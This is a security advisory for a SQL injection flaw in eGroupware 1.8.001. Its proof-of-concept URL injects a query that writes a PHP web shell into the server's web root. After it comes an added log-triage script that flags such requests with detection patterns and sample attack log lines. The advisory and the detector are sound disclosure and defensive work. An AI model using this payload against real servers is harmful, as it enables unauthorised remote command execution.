A SQL injection vulnerability in eGroupware version 1.8 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.
------------------------------------------------------------------------
Software................eGroupware 1.8.001
Vulnerability...........SQL Injection
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........4/7/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A SQL injection vulnerability in eGroupware 1.8.001 can be exploited to
extract arbitrary data. In some environments it may be possible to
create a PHP shell.
--PoC--
http://localhost/egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'%3C?php%20system($_GET[%22CMD%22]);%20?%3E','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23
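--Detection (added example)--
The following log triage script is an added example and is not part of the original advisory or of eGroupware. It flags requests to the script path named in the PoC whose id parameter carries SQL. Assumptions: Apache common/combined log format, integer-only legitimate id values, and constructed sample log lines.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the PoC URL in this advisory.
TARGET = "/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php"
# Assumption: Apache common/combined access-log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
FILE_WRITE = re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)
UNION = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)

def classify(line):
    """Return (client, status, verdict) for requests to TARGET, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, uri, status = m.group(1), m.group(2), int(m.group(3))
    parts = urlsplit(uri)
    # Compare case-insensitively: the advisory's test host is Windows.
    if not unquote(parts.path).lower().endswith(TARGET):
        return None
    query = unquote(parts.query.replace("+", " "))
    ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    if FILE_WRITE.search(query):
        verdict = "sqli-file-write"
    elif UNION.search(query):
        verdict = "sqli-union"
    # Assumption: legitimate id values are plain integers.
    elif any(not re.fullmatch(r"\d+", v) for v in ids):
        verdict = "non-numeric-id"
    else:
        verdict = "benign"
    return client, status, verdict

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2011:10:00:01 +0000] "GET /egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=3 HTTP/1.1" 200 512',
    '192.0.2.66 - - [07/Apr/2011:10:02:13 +0000] "GET /egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0 HTTP/1.1" 200 0',
    "192.0.2.66 - - [07/Apr/2011:10:02:40 +0000] \"GET /egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23 HTTP/1.1\" 200 0",
    '192.0.2.10 - - [07/Apr/2011:10:03:05 +0000] "GET /egroupware/index.php HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return only the non-benign hits on TARGET."""
    return [r for r in map(classify, lines) if r and r[2] != "benign"]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:16} {client} HTTP {status}")
```

A sqli-file-write hit is a cue to check the web root for files the application did not ship.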